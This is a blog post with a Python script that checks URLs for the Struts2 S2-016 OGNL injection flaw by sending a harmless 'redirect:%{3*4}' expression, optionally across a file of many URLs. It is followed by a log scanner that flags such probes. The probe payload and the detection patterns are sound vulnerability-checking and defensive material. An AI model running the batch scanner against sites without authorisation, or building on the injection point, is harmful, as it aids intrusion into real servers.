Detection code for the Struts S2-016 remote arbitrary command execution vulnerability

A couple of days ago exploit tools for the Struts vulnerability were everywhere; see S2-016 and "Struts2 hit by another remote code execution vulnerability". At the time I wrote a very simple Python program to check whether a URL is affected by this vulnerability.
#!/usr/bin/env python
#coding=utf-8

'''
author: zz_d
date: 2013-07-17
'''

# Python 2 script (urllib.urlopen and the print statement).
import sys
import urllib
import getopt


def help():
    print '%s [-f urlfile] [-u url] [-h]' % sys.argv[0]

def struts_test(url):
    # Append a harmless OGNL expression through the "redirect:" prefix.
    # A vulnerable DefaultActionMapper evaluates %{3*4} and redirects to ".../12".
    turl = '%s?redirect:%%25{3*4}' % url
    # Expected redirect target: the directory part of the URL plus "/12".
    rurl = '%s/12' % url[:url.rfind('/')]
    ur = urllib.urlopen(turl)
    # Compare the final URL after redirects, dropping any ";jsessionid=..." suffix.
    vulnerable = (rurl == ur.url.split(';')[0])
    ur.close()
    return vulnerable

if __name__ == "__main__":

    url = None
    urlfile = None

    try:
        opts, args = getopt.getopt(sys.argv[1:], 'f:u:h')
    except getopt.GetoptError as err:
        print str(err)
        help()
        sys.exit(-1)

    for t, a in opts:
        if t == '-f':
            urlfile = a
        if t == '-u':
            url = a
        if t == '-h':
            help()
            sys.exit(0)
    if not url and not urlfile:
        help()
        sys.exit(-1)

    if url:
        if struts_test(url):
            print '%s is Vul' % url
    if urlfile:
        # One URL per line; blank lines are skipped and the file is closed on exit.
        with open(urlfile, 'r') as fs:
            for line in fs:
                line = line.strip()
                if line and struts_test(line):
                    print '%s is Vul' % line
When using it, give url in the form "http://www.example.com/abc.action".
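The probe above works by sending a `redirect:%{3*4}` parameter and watching for the evaluated redirect. The same pattern is what a defender should look for on the server side. The following is an added example, not part of the original post: a Python 3 scanner that reads combined-format access-log lines and flags requests whose parameter names start with one of the DefaultActionMapper prefixes abused by S2-016 (`action:`, `redirect:`, `redirectAction:`) and carry an OGNL expression marker (`${` or `%{`). The log lines, IP addresses and paths are constructed for the example; the function names are my own.

```python
"""Flag S2-016-style probes in web-server access logs (added example, Python 3).

A plain "redirect:/somewhere" parameter is ordinary Struts 2 usage of the
DefaultActionMapper prefixes, so only a prefix combined with an OGNL marker
("${" or "%{") is reported.
"""
import re
from urllib.parse import unquote, urlsplit

# Parameter-name prefixes handled by DefaultActionMapper and abused in S2-016.
PREFIXES = ("action:", "redirect:", "redirectAction:")
# Start of an OGNL expression once the parameter has been URL-decoded.
OGNL_RE = re.compile(r"[$%]\{")
# Apache/nginx combined log format (only the fields used here are captured).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log: two probes (a harmless 3*4 check and a 1+1 check on the
# redirectAction: prefix), one legitimate request whose parameter is merely named
# "redirect", and one request without a query string.
LOG_LINES = """\
203.0.113.5 - - [17/Jul/2013:10:00:01 +0800] "GET /abc.action?redirect:%25%7B3*4%7D HTTP/1.1" 302 0
203.0.113.5 - - [17/Jul/2013:10:00:02 +0800] "GET /abc.action?redirectAction:%24%7B1%2B1%7D HTTP/1.1" 302 0
198.51.100.7 - - [17/Jul/2013:10:00:03 +0800] "GET /abc.action?page=2&redirect=/home HTTP/1.1" 200 5123
198.51.100.7 - - [17/Jul/2013:10:00:04 +0800] "POST /login.action HTTP/1.1" 200 731
"""


def parse_line(line):
    """Return the captured fields of one combined-format log line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_params(target):
    """Return the decoded query parameters of a request target that look like S2-016 probes."""
    hits = []
    query = urlsplit(target).query
    for part in query.split("&"):
        if not part:
            continue
        # The server decodes once, so one unquote reproduces what Struts saw
        # (the script's "%25{3*4}" becomes "%{3*4}").
        decoded = unquote(part)
        name = decoded.split("=", 1)[0]
        if name.startswith(PREFIXES) and OGNL_RE.search(decoded):
            hits.append(decoded)
    return hits


def scan_log(text):
    """Scan log text and return one finding per request carrying a suspicious parameter."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # not a combined-format line; skip rather than guess
        hits = suspicious_params(rec["target"])
        if hits:
            findings.append({
                "ip": rec["ip"],
                "time": rec["time"],
                "status": rec["status"],
                "params": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(LOG_LINES):
        print("%s %s status=%s params=%s" % (f["time"], f["ip"], f["status"], f["params"]))
```

A `302` response to such a request is the same signal the probe script relies on, so pairing the flagged parameter with a redirect status in the log is a strong indication that the probe succeeded against that host.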